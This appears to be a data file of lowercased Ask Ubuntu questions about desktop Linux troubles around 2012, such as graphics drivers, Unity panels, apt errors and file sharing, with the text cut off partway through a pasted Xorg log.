101170	repeated / stretched top panel with gnome classic	has anyone seen something like what is shown in this screenshot ( the back of the top panel is repeated before the panel itself is shown ) ? i 'm using : ubuntu 11.10 switched to gnome classic dual monitors nvidia driver version current-updates ( which is 280.13 ) i 'm posting this question here as opposed to launchpad , because i 'm wondering if anyone has seen something like this and have a good guess at what could be causing the stretching of the top panel . the size of the panel is set to 24 pixels in `` properties '' so it 's not that . the resolution of both screens is 1600 x 1200 , so it 's not that . any leads ?
101173	does unity generally perform better with proprietary nvidia drivers ?	i always feel stressed when updating or switching to proprietary drivers , because it has crashed my ubuntu before . unity is a little slow on my system . can switching to a new version of proprietary drivers speed it up some day ?
101178	how to change the `` page not found '' page in a server	how do you change the default page that says `` this page is not found on this server '' ? where is it located so i can change it ? because i want to change if for my own . its the 404 error ( `` page not found '' ) , like this is a example of a server pages not found http : //www.apple.com/apple/ http : //www.webdevelopersnotes.com/hosting/error_message_displayed_by_web_server_for_non_existent_page.gif just to be clear the page is not their i just want to change the page that is shown if that page is not found on that server .
101179	restart only gui session or restart only operating system ?	is it possible in linux to restart only gui session or os ( i m not talking about restarting pc ) back in windows 98 if u want to restart the gui session or only os u just need to hold down shift key and it will restart the your gui session or only os & it work fine windows 98 shift + restart
101194	how can i get a image of the default login wallpaper ?	where can i find the folder where the login screen background/wallpaper so that i can copy it to my pictures folder ? or even better a terminal command . i 'm using bash .
101197	how can i make an application start up when i login ?	i want terminal to start up right when i login . is there a command ? if so , i 'm using bash .
101198	what is this error when trying to install ati video driver ?	when trying to install the driver the following error message occurs error : ./default_policy.sh does not support version default : v2 : i686 : lib : :none:3.0.0-15-generic ; make sure that the version is being correctly set by -- iscurrentdistro this was given when using `` uncompressing ati proprietary linux driver-8.593 '' in a terminal i have an ibm thinkpad t42 and no video driver is loaded since i installed ubuntu 11.10
101205	errors shown while installing apps , but the apps still works	i started to notice the error below when i install apps from the terminal with sudo apt-get install the apps work but the error still remains i do n't know if its due the dpkg or ubuntu-software-center : /sbin/ldconfig.real : /usr/lib32/libglew.so.1.5 is not a symbolic link ls -l /usr/lib32/libglew.so.1.5 returns -rw-r -- r -- 1 root root 225068 2012-01-29 22:10 /usr/lib32/libglew.so.1.5 file /usr/lib32/libglew.so.1.5 returns /usr/lib32/libglew.so.1.5 : elf 32-bit lsb shared object , intel 80386 , version 1 ( sysv ) , dynamically linked , stripped . how do i solve this , should i worry ?
101207	share folders between pc and android	i want to know how to share any folders between android and ubuntu . i 've got it with windowsxp . on my android phone i 've installed the app es file explorer . i 've created a folder in the pc and it is shared . with the app from cellphone i can find the shared folder but when i try open it , the app says 'the account has no permissions ' i do n't know how to give these permissions .
101209	how can i decrease the frequency of the fan running on my laptop ?	i am an ubuntu 11.10 user with a laptop with a noisy fan . the fan runs way too frequently , blowing when all i 'm doing is web browsing . i am willing to sacrifice speed for a less hot laptop , can someone please tell me how to make my fan turn on less frequently ? any help will be greatly appreciated .
101210	android ubuntu one client on a motorola atrix - pictures not picked up from sd card , only from internal card	my atrix runnig the ubuntu one client does not pickup pictures from the sd card . if i point the camera client back to the default internal sd location it appears to work fine . the does work with the dropbox and the google+ apps . i know that the way that the sd card are 'mapped ' is different on the atrix . does anyone have a fix for this ? thanks , matt
101215	stumpwm as window manager	how can i set up stumpwm to be my windows manager on ubuntu 10.10 ? right now i am using compiz .
101217	how do i remove this duplicate sources.list entry ?	sometimes , when i run sudo apt-get update or install an app sudo apt-get install i get the error below at the bottom in the gnome-terminal and i ca n't remove it . i searched for it in the software-sources and in y-ppa-manager and i am not sure i want to mess with the sources list since i am a bit of a noob . duplicate sources.list entry http : //archive.canonical.com/ubuntu/ oneiric/partner amd64 packages \ ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_oneiric_partner_binary-amd64_packages )
101226	where does ubuntu store its keyboard shortcut configuration ?	is there a place in `` ubuntu '' that stores a complete list of what keys/combinations/shortcuts are bound to what ? what are unity 's keyboard and mouse shortcuts ? list some `` unity '' shortcuts to the dash , launcher , etc . and how to list compiz keybindings in use ? shows a way to list compiz bindings , but i 'm looking for more than that ( not just a few of the keybindings limited only to unity or compiz ) although it 's a start . is there a global list of key bindings/key combinations/keyboard shortcuts in use , that is stored somewhere in ubuntu or is there a way to compile and list them ? one that applies to ubuntu and things running in it ( unity , compiz , shortcuts to programs , etc. ) . surely , ubuntu must store this somewhere for the key combination pressed on the keyboard to be directed to what it 's connected with ? if there is no such place in ubuntu , then post so as an answer , so future users , that search , will know .
101230	where can i download geforce gt425m driver ?	hi people i have just installed ubuntu 11.10 , so i do not know much about it . my problem is that ubuntu does not recognize my graphic card . i use intel hd integrated ( i3 processor ) nvidia geforce gt 425m . but ubuntu does not recognice my graphic card , under system info it says processor : intel® core™ i3 cpu m 370 @ 2.40ghz × 4 graphic : unknown os-type : bit hope some one can help me . thanks
101231	how can i make awn-only desktop session with gnome3 ?	is there any way to use awn as my only panel with gnome3/shell/unity installed without breaking the desktop ? ? i tried this a wee while ago by changing the panel in the sessions to awn and it completely killed my desktop .
101233	how can i make a music playlist out of a .txt file ?	i am using ubuntu 11.10 ( i do n't think that really matters ) with bash . how can i make a music playlist out of a .txt file ? it is a command but i forgot it . i would appreciate it if someone would write a tutorial .
101237	ubuntu wont start up after uninstalling packages with synaptic	i have had ubuntu for a while and i uninstalled a few packages with synaptic . i then restarted the computer and it turns on the screen for a second , then the screen says `` no signal imput '' and turns off , but the computer is still on . the packages were for mysql , php5 , and xserver . i have no idea what is going on and i really need to use it . please help : ( ! fyi i did n't know at first how to uninstall the packages using synaptic so i saved it as a text file on accident . i opened it and one of the packages was along the lines of ubuntu-desktop . is this the problem ? if so , how do i re install it . i cant afford a clean install , because i have many files and programs that are irreplaceable .
101238	how can i access windows 7 files/folders from ubuntu 11.10 ?	i installed samba but i could not get it working . is there another program or way to access them ? can you please direct me to a online tutorial or write one ?
101242	how can i get something like nautilus 's `` spatial '' behaviour in 11.10 and later ?	until recently , nautilus had an optional `` spatial '' mode as an alternative to its usual browser mode . users could enable it by opening nautilus 's preferences and selecting `` open each folder in its own window . '' choosing this option resulted in a stripped down interface , and folders would always open in the same place on the screen . it looked something like this : that checkbox is still there , but it does n't do the same thing : while every folder opens in a new window , those windows are all the same size and positioned the same way . nautilus does n't restore the size and position of each folder , which is what spatial mode was all about . this difference really shows if someone opens a folder in a new window , and then opens the same folder again . nautilus will create another window instead of focusing the existing window . i help someone who is currently using ubuntu 10.04 , and he will be upgrading to 12.04 in the future . he is very comfortable with nautilus 's spatial behaviour and i think he would be disappointed to lose it . is there an alternative file manager , or perhaps some less obvious option , that will give him an interface similar to the one he is comfortable with ?
101249	can i avoid loading the graphics	i completely stuffed up when trying to purge the fglrx driver to upgrade it to the latest one . this lab computer has full disk encryption , and there are 3 home accounts that are each encrypted . when i load into the computer , i can enter the passphrase for the full disk encryption , however , the whole screen goes completely fuzzy before it gets to the login screen . is there some way i can turn off the graphics , so that people can access their files , copy them over to a backup disk , and maybe i can do a fresh install . alternatively , if i can get a command line going , i can attempt to resolve the problem . however , the computer goes fuzzy between entering the passphrase and login screen . please help
101251	can i remove the `` round square '' around an application icon on the launcher ?	i want to make it look like the bottom dock of windows 7 . is that possible ? maybe through the terminal ? i 'm using bash for the record . i 'm using the unity desktop . do you see the squares ?
101252	apt sources.list problem , packages not found ?	i am trying to install wicd but getting following errors on my ubuntu 10.04 box sudo apt-get install wicd err http : //archive.ubuntu.schoolnet.lk/ubuntu/ lucid/universe python-wicd 1.7.0+ds1-2 could not connect to archive.ubuntu.schoolnet.lk:80 ( 103.29.60.18 ) . - connect ( 111 : connection refused ) err http : //archive.ubuntu.schoolnet.lk/ubuntu/ lucid/main python-iniparse 0.3.1-1 unable to connect to archive.ubuntu.schoolnet.lk : http : err http : //archive.ubuntu.schoolnet.lk/ubuntu/ lucid/universe wicd-daemon 1.7.0+ds1-2 unable to connect to archive.ubuntu.schoolnet.lk : http : err http : //archive.ubuntu.schoolnet.lk/ubuntu/ lucid/universe wicd-gtk 1.7.0+ds1-2 unable to connect to archive.ubuntu.schoolnet.lk : http : err http : //archive.ubuntu.schoolnet.lk/ubuntu/ lucid/universe wicd 1.7.0+ds1-2 unable to connect to archive.ubuntu.schoolnet.lk : http : failed to fetch http : //archive.ubuntu.schoolnet.lk/ubuntu/pool/universe/w/wicd/python-wicd_1.7.0+ds1-2_all.deb could not connect to archive.ubuntu.schoolnet.lk:80 ( 103.29.60.18 ) . - connect ( 111 : connection refused ) failed to fetch http : //archive.ubuntu.schoolnet.lk/ubuntu/pool/main/p/python-iniparse/python-iniparse_0.3.1-1_all.deb unable to connect to archive.ubuntu.schoolnet.lk : http : failed to fetch http : //archive.ubuntu.schoolnet.lk/ubuntu/pool/universe/w/wicd/wicd-daemon_1.7.0+ds1-2_all.deb unable to connect to archive.ubuntu.schoolnet.lk : http : failed to fetch http : //archive.ubuntu.schoolnet.lk/ubuntu/pool/universe/w/wicd/wicd-gtk_1.7.0+ds1-2_all.deb unable to connect to archive.ubuntu.schoolnet.lk : http : failed to fetch http : //archive.ubuntu.schoolnet.lk/ubuntu/pool/universe/w/wicd/wicd_1.7.0+ds1-2_all.deb unable to connect to archive.ubuntu.schoolnet.lk : http : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
101253	can i run apache2 as my user on my ubuntu for development purposes ?	i 've gone and re-installed ubuntu recently and i 'm going thru the process of re-setup/install of some things . one is to setup apache2 , mysql , etc , which is working correctly now . i 'm wondering if i should work my php/mysql projects out of the /var/www/ directory for development purposes ; or if i should create symnlinks over to my users directory ; or perhaps i should just change apache2 to run as the same user as me . i 'm the only user on this computer . any suggestions ? thanks , jeff
101254	vnc clients with snow leopard support	i am looking for a good vnc client to use with snow leopard . vinagre works , but is not flexible , and thus slow . i tried a couple other ones , but they failed to connect . ( incompatible protocol or security , or something to that effect . ) i am running ubuntu 11.10 .
101259	freeze at ubuntu splash	i 've been browsing the web about this problem but nothing worked so far . i did some updates to my system so i could play mp3s and 4s on the videoplayer and after that videoplayer stoped working and i shut the machine down for a while . i got board this morning and wanted to surf the web but after i powered on my computer , it stopped loading . i can shut it down with the power button and what not but i let it sit for an hour and it didnt make it pass the splash screen ( the word 'ubuntu ' and the little dots ) . so i entered recovery mode and scaned my disk and did the repair thing and cleaned it up but it still is n't doing anything . i 'm running ubuntu 10.11 i guess and no dual boot . i hate window .
101260	what does `` invalid protocol '' mean ''	i was trying to do a search using dolphin file manager and , when i start typing the file name in the search box , i get the message `` invalid protocol '' after the first 4 characters and i can not do the search . i want to do the search on my hard drive . what does the message mean ? i have a screen shot of the error but i ca n't figure out how to post it here .
101262	moving mobile phone pictures directory	i use an iphone and when ubuntu one syncs my photos it creates a directory on my computer called 'pictures - muffin ' in the home directory ( muffin being the name of my iphone ) . my home directory looks something like this desktop documents downloads pictures 'pictures - muffin ' music audiobooks it 's weird and annoying that pictures appears twice in my home directory . i would rather 'pictures - muffin ' directory just be called 'muffin ' , but it does not let me , it just removes the photo syncing option i would preferably like it inside the directory 'pictures ' as well if that 's possible .
101267	ca n't install ppa : utouch-team/utouch on lucid	i am trying to install an apple magic trackpad using the instructions here . i would use these command . sudo apt-add-repository ppa : utouch-team/utouch sudo apt-get update sudo apt-get install ginn but on the update i get these errors . w : failed to fetch http : //ppa.launchpad.net/user/ppa-name/ubuntu/dists/lucid/main/binary-i386/packages.gz 404 not found how do i resolve this ? i am using ubuntu 10.04 lts .
101269	pandora does n't work with firefox but with chromium	i have a brand new installation of ubuntu 11.1 . when i installed i checked the box to download the updates while installing and i also installed the additional mp3 software for the plug-ins . for some reason firefox will not run pandora . firefox really crashes with pandora . chromium however is doing a great job of running pandora . does anyone know why this may be happening so i can take steps to correct the problem ?
101271	why do i need to format my usb on windows in order to use unetbootin	if i prepare an ubuntu startup usb with unetbootin or startup disk creator , it does not boot on my pc . but if i format the same drive on windows , then restart on linux to create the bootable usb , it works . ( yes , i must format the usb drive on windows 7 first for linux to boot ) . i have gigabyte ga-880m-usb3 mainboard .
101275	additional drivers : `` you are not authorized to perform this action ''	anytime i do anything requiring root privileges i need to enter my password and it works . with only one exception : running `` additional drivers '' , which simply complains `` you are not authorized to perform this action '' . i suppose that starting it with sudo should help , but how do i find out what 's the real name of the `` additional drivers '' application ? or what else could i try ?
101278	configure linux kernel for arm	i want to configure kernel 2.6.30 for arm cpu in a graphical environment ( under ubuntu 10.04 ) . there is program , named `` qconf '' witch do this easily . but i ca n't run it . i download and install `` qconf '' but it 's not graphical ( just , terminal commands ) . if you know a way to install it or an other safe and stable program , help me . thanks .
101282	language support has an unwanted chinese language option	when i open system settings and open the language support dialog , there is an option in the list , for ( i think ) chinese . as far as i can recall i have never installed this language myself . searching for language-pack in synaptic , the following packages are listed as installed : language-pack-en , language-pack-en-base , language-pack-gnome-en and language-pack-gnome-en-base . if i click the installed languages button in the language support dialog , i do not see chinese listed as installed : only english has a checkmark . is this additional language taking up space ? how can i remove it ? here is the output of locate language-pack : % locate language-pack /usr/share/doc/language-pack-en /usr/share/doc/language-pack-en-base /usr/share/doc/language-pack-gnome-en /usr/share/doc/language-pack-gnome-en-base /usr/share/doc/language-pack-en/changelog.gz /usr/share/doc/language-pack-en/copyright /usr/share/doc/language-pack-en-base/changelog.gz /usr/share/doc/language-pack-en-base/copyright /usr/share/doc/language-pack-gnome-en/changelog.gz /usr/share/doc/language-pack-gnome-en/copyright /usr/share/doc/language-pack-gnome-en-base/changelog.gz /usr/share/doc/language-pack-gnome-en-base/copyright /usr/share/locales/install-language-pack /usr/share/locales/remove-language-pack /var/cache/apt/archives/language-pack-en-base_1 % 3a11.10+20120103_all.deb /var/cache/apt/archives/language-pack-en-base_1 % 3a12.04+20111229_all.deb /var/cache/apt/archives/language-pack-en_1 % 3a11.10+20120103_all.deb /var/cache/apt/archives/language-pack-en_1 % 3a12.04+20120202_all.deb /var/cache/apt/archives/language-pack-gnome-en-base_1 % 3a11.10+20120103_all.deb /var/cache/apt/archives/language-pack-gnome-en-base_1 % 3a12.04+20111229_all.deb /var/cache/apt/archives/language-pack-gnome-en_1 % 3a11.10+20120103_all.deb /var/cache/apt/archives/language-pack-gnome-en_1 % 3a12.04+20120202_all.deb /var/lib/dpkg/info/language-pack-en-base.list /var/lib/dpkg/info/language-pack-en-base.md5sums /var/lib/dpkg/info/language-pack-en-base.postinst /var/lib/dpkg/info/language-pack-en-base.postrm /var/lib/dpkg/info/language-pack-en.list /var/lib/dpkg/info/language-pack-en.md5sums /var/lib/dpkg/info/language-pack-fr-base.list /var/lib/dpkg/info/language-pack-fr-base.postrm /var/lib/dpkg/info/language-pack-gnome-en-base.list /var/lib/dpkg/info/language-pack-gnome-en-base.md5sums /var/lib/dpkg/info/language-pack-gnome-en-base.postinst /var/lib/dpkg/info/language-pack-gnome-en-base.postrm /var/lib/dpkg/info/language-pack-gnome-en.list /var/lib/dpkg/info/language-pack-gnome-en.md5sums and here is the output of ls /usr/share/locale-langpack : % ls /usr/share/locale-langpack en en @ boldquot en_gb en @ quot en_us en_au en_ca en_nz en @ shaw en_us @ piglatin
101284	after latest update mouse crashes unity	so moving the cursor crashes unity back to the login screen . this happens even when controlling the cursor with a keyboard . unity wo n't even start , unless in 2d . i 've tried uninstalling ati 's drivers . no luck . this is some major suckage .
101288	trouble installing mac osx lion theme	so i wanted to play a prank on some friends and tried to install the mac osx lion theme from noobslab mac osx lion theme . to this point , i 've only dabbled a bit with linux , so i 'm still a little shaky on configuring and installing just about anything . anyhow , i run the first command per the instructions , but when i run the second one : sudo tar -xzvf mac-lion-cursors.tar.gz -c /usr/share/icons i recieve this error : tar ( child ) : mac-lion-cursors.tar.gz : can not open : no such file or directory tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now it seems to only occur with commands that begin with tar . any ideas ?
101291	epiphany web app not working	i have ubuntu 11.10 with gnome-shell installed . i installed epiphany web browser using this method : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update & & sudo apt-get install epiphany-browser now i can apparently create web apps from the `` file '' menu , but i can neither directly start them straight after creation ( nothing happens clicking on launch ) nor can i find them within `` applications '' but i can see them using `` about : application '' . can anyone help me ?
101292	updating compilers without updating the system	i am running karmic but would like to update gcc etc . to lucid . can this be done and if yes , how ?
101293	configuring mouse buttons	i am using a hp nk527aa wireless mouse with two side buttons . his mouse wheel is half broken : i can scroll but i ca n't click it . in windows i configured the side buttons as 3rd mouse button but unfortunately the only available drivers are for windows . ubuntu treats the side-buttons as back\forward buttons and it 's really annoying . is there a way to configure the buttons if though the is no driver ?
101294	safely close virtualbox machine on host reboot	i 'm running windows 7 inside virtualbox on ubuntu 11.10 . everything works fine . i 'm running it at startup , but i have a problem with rebooting . when i type sudo reboot now the state of the virtual windows 7 is n't saved . after the reboot the virtualbox starts , but instead of the running windows i get the windows ' 7 crash boot menu and the windows is booting again . is there an option that ubuntu could send some signal to the virtual box to safely close the instance before the host reboot ?
101296	how do i generate a tsp art ?	i have 11.10 installed and i am trying to generate tsp art . i am using the instructions given here . but , i am not sure how to run the commands given in the article . i have tried to run the commands given on the page and get the following : bubba @ bubbasbox : ~ $ /home/bubba/desktop/tsp_art_tools_0_8_1/tspart.py/home/bubba/desktop/tsp_art_tools_0_8_1/baby04.pbm bash : /home/bubba/desktop/tsp_art_tools_0_8_1/tspart.py/home/bubba/desktop/tsp_art_tools_0_8_1/baby04.pbm : not a directory bubba @ bubbasbox : ~ $ /home/bubba/desktop/tsp_art_tools_0_8_1/tspart.py from : ca n't read /var/mail/tspbitcity from : ca n't read /var/mail/tspsolution /home/bubba/desktop/tsp_art_tools_0_8_1/tspart.py : line 74 : syntax error near unexpected token `==' /home/bubba/desktop/tsp_art_tools_0_8_1/tspart.py : line 74 : `if sys.platform.lower ( ) == 'win32 ' : ' so how do i enter the command correctly ?
101306	how do i install gtk+ 3.0 ?	how can i install gtk+ 3.0 on ubuntu 11.10 and use that instead of gtk+ 2.24 ?
101307	recommended ati driver ?	i 'm using a laptop with a mobility radeon hd 540v . i 'd like to install the driver recommended by the amd website . is that fine or should i install one from the `` additional drivers '' menu ? do i have to deactivate anything first ? i 'm asking because i 'd like to get the full performance out of my card .
101308	xorg segmentation fault - seems to be relevant to evdev	since yesterday , after selecting to update some packages recommended by the update manager , i am not able to use my ubuntu 11.10 . everything seems to be working fine , until i move the mouse . as soon as the mouse is moved , xserver crashes with segmentation fault ( caught signal 11 ) . here is the xorg.0.log file -- any help on this will be really appreciated . [ 25.145 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 25.145 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 25.145 ] ( ++ ) using vt number 7 [ 25.145 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 25.145 ] ( ii ) [ kms ] kernel modesetting enabled . [ 25.145 ] ( ww ) falling back to old probe method for vesa [ 25.145 ] ( ww ) falling back to old probe method for fbdev [ 25.146 ] ( ii ) loading sub module `` fbdevhw '' [ 25.146 ] ( ii ) loadmodule : `` fbdevhw '' [ 25.146 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 25.146 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 25.146 ] compiled for 1.10.4 , module version = 0.0.2 [ 25.146 ] abi class : x.org video driver , version 10.0 [ 25.146 ] ( ii ) radeon ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 25.146 ] ( == ) radeon ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 25.146 ] ( ii ) radeon ( 0 ) : pixel depth = 24 bits stored in 4 bytes ( 32 bpp pixmaps ) [ 25.146 ] ( == ) radeon ( 0 ) : default visual is truecolor [ 25.146 ] ( == ) radeon ( 0 ) : rgb weight 888 [ 25.146 ] ( ii ) radeon ( 0 ) : using 8 bits per rgb ( 8 bit dac ) [ 25.146 ] ( -- ) radeon ( 0 ) : chipset : `` ati radeon x1200 '' ( chipid = 0x791e ) [ 25.146 ] ( ii ) radeon ( 0 ) : pci card detected [ 25.146 ] drmopendevice : node name is /dev/dri/card0 [ 25.146 ] drmopendevice : open result is 12 , ( ok ) [ 25.146 ] drmopenbybusid : searching for busid pci:0000:01:05.0 [ 25.146 ] drmopendevice : node name is /dev/dri/card0 [ 25.146 ] drmopendevice : open result is 12 , ( ok ) [ 25.146 ] drmopenbybusid : drmopenminor returns 12 [ 25.146 ] drmopenbybusid : drmgetbusid reports pci:0000:01:05.0 [ 25.146 ] ( ii ) loading sub module `` exa '' [ 25.146 ] ( ii ) loadmodule : `` exa '' [ 25.146 ] ( ii ) loading /usr/lib/xorg/modules/libexa.so [ 25.146 ] ( ii ) module exa : vendor= '' x.org foundation '' [ 25.146 ] compiled for 1.10.4 , module version = 2.5.0 [ 25.146 ] abi class : x.org video driver , version 10.0 [ 25.146 ] ( ii ) radeon ( 0 ) : kms color tiling : enabled [ 25.146 ] ( ii ) radeon ( 0 ) : kms pageflipping : enabled [ 25.146 ] ( ii ) radeon ( 0 ) : swapbuffers wait for vsync : enabled [ 25.199 ] ( ii ) radeon ( 0 ) : output vga-0 has no monitor section [ 25.372 ] ( ii ) radeon ( 0 ) : output s-video has no monitor section [ 25.404 ] ( ii ) radeon ( 0 ) : output dvi-0 has no monitor section [ 25.437 ] ( ii ) radeon ( 0 ) : output dvi-1 has no monitor section [ 25.490 ] ( ii ) radeon ( 0 ) : edid for output vga-0 [ 25.490 ] ( ii ) radeon ( 0 ) : manufacturer : gsm model : 57a0 serial # : 252027 [ 25.490 ] ( ii ) radeon ( 0 ) : year : 2011 week : 10 [ 25.490 ] ( ii ) radeon ( 0 ) : edid version : 1.3 [ 25.490 ] ( ii ) radeon ( 0 ) : analog display input , input voltage level : 0.700/0.700 v [ 25.490 ] ( ii ) radeon ( 0 ) : sync : separate composite [ 25.490 ] ( ii ) radeon ( 0 ) : max image size [ cm ] : horiz . : 48 vert . : 27 [ 25.490 ] ( ii ) radeon ( 0 ) : gamma : 2.20 [ 25.490 ] ( ii ) radeon ( 0 ) : dpms capabilities : standby suspend off ; rgb/color display [ 25.490 ] ( ii ) radeon ( 0 ) : first detailed timing is preferred mode [ 25.490 ] ( ii ) radeon ( 0 ) : redx : 0.645 redy : 0.335 greenx : 0.301 greeny : 0.616 [ 25.490 ] ( ii ) radeon ( 0 ) : bluex : 0.145 bluey : 0.069 whitex : 0.313 whitey : 0.329 [ 25.490 ] ( ii ) radeon ( 0 ) : supported established timings : [ 25.490 ] ( ii ) radeon ( 0 ) : 720x400 @ 70hz [ 25.490 ] ( ii ) radeon ( 0 ) : 640x480 @ 60hz [ 25.490 ] ( ii ) radeon ( 0 ) : 640x480 @ 75hz [ 25.490 ] ( ii ) radeon ( 0 ) : 800x600 @ 60hz [ 25.490 ] ( ii ) radeon ( 0 ) : 800x600 @ 75hz [ 25.490 ] ( ii ) radeon ( 0 ) : 1024x768 @ 60hz [ 25.490 ] ( ii ) radeon ( 0 ) : 1024x768 @ 75hz [ 25.490 ] ( ii ) radeon ( 0 ) : 1280x1024 @ 75hz [ 25.490 ] ( ii ) radeon ( 0 ) : manufacturer 's mask : 0 [ 25.490 ] ( ii ) radeon ( 0 ) : supported standard timings : [ 25.490 ] ( ii ) radeon ( 0 ) : # 0 : hsize : 1680 vsize 1050 refresh : 60 vid : 179 [ 25.490 ] ( ii ) radeon ( 0 ) : # 1 : hsize : 1280 vsize 1024 refresh : 60 vid : 32897 [ 25.490 ] ( ii ) radeon ( 0 ) : # 2 : hsize : 1280 vsize 1024 refresh : 75 vid : 36737 [ 25.490 ] ( ii ) radeon ( 0 ) : # 3 : hsize : 1152 vsize 864 refresh : 75 vid : 20337 [ 25.490 ] ( ii ) radeon ( 0 ) : supported detailed timing : [ 25.490 ] ( ii ) radeon ( 0 ) : clock : 148.5 mhz image size : 477 x 268 mm [ 25.490 ] ( ii ) radeon ( 0 ) : h_active : 1920 h_sync : 2008 h_sync_end 2052 h_blank_end 2200 h_border : 0 [ 25.490 ] ( ii ) radeon ( 0 ) : v_active : 1080 v_sync : 1084 v_sync_end 1089 v_blanking : 1125 v_border : 0 [ 25.490 ] ( ii ) radeon ( 0 ) : ranges : v min : 56 v max : 75 hz , h min : 30 h max : 83 khz , pixclock max 155 mhz [ 25.490 ] ( ii ) radeon ( 0 ) : monitor name : w2240 [ 25.490 ] ( ii ) radeon ( 0 ) : serial no : 110ndcr7e027 [ 25.490 ] ( ii ) radeon ( 0 ) : edid ( in hex ) : [ 25.490 ] ( ii ) radeon ( 0 ) : 00ffffffffffff001e6da0577bd80300 [ 25.490 ] ( ii ) radeon ( 0 ) : 0a1501036c301b78ea3335a5554d9d25 [ 25.490 ] ( ii ) radeon ( 0 ) : 115054a54b00b3008180818f714f0101 [ 25.490 ] ( ii ) radeon ( 0 ) : 010101010101023a801871382d40582c [ 25.490 ] ( ii ) radeon ( 0 ) : 4500dd0c1100001a000000fd00384b1e [ 25.490 ] ( ii ) radeon ( 0 ) : 530f000a202020202020000000fc0057 [ 25.490 ] ( ii ) radeon ( 0 ) : 323234300a20202020202020000000ff [ 25.490 ] ( ii ) radeon ( 0 ) : 003131304e44435237453032370a00e3 [ 25.490 ] ( ii ) radeon ( 0 ) : edid vendor `` gsm '' , prod id 22432 [ 25.490 ] ( ii ) radeon ( 0 ) : using edid range info for horizontal sync [ 25.490 ] ( ii ) radeon ( 0 ) : using edid range info for vertical refresh [ 25.490 ] ( ii ) radeon ( 0 ) : printing ddc gathered modelines : [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1920x1080 '' x0.0 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync -vsync ( 67.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 800x600 '' x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 640x480 '' x0.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 640x480 '' x0.0 25.18 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 720x400 '' x0.0 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1280x1024 '' x0.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1024x768 '' x0.0 78.75 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.0 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1024x768 '' x0.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 800x600 '' x0.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1680x1050 '' x0.0 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync ( 65.3 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1280x1024 '' x0.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1152x864 '' x0.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : printing probed modes for output vga-0 [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1920x1080 '' x60.0 148.50 1920 2008 2052 2200 1080 1084 1089 1125 +hsync -vsync ( 67.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1680x1050 '' x60.0 146.25 1680 1784 1960 2240 1050 1053 1059 1089 -hsync +vsync ( 65.3 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1280x1024 '' x75.0 135.00 1280 1296 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 80.0 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1280x1024 '' x60.0 108.00 1280 1328 1440 1688 1024 1025 1028 1066 +hsync +vsync ( 64.0 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1152x864 '' x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync ( 67.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1024x768 '' x75.1 78.80 1024 1040 1136 1312 768 769 772 800 +hsync +vsync ( 60.1 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 1024x768 '' x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync ( 48.4 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 800x600 '' x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync ( 46.9 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 800x600 '' x60.3 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync ( 37.9 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 640x480 '' x75.0 31.50 640 656 720 840 480 481 484 500 -hsync -vsync ( 37.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 640x480 '' x60.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync ( 31.5 khz ) [ 25.490 ] ( ii ) radeon ( 0 ) : modeline `` 720x400 '' x70.1 28.32 720 738 846 900 400 412 414 449 -hsync +vsync ( 31.5 khz ) [ 25.664 ] ( ii ) radeon ( 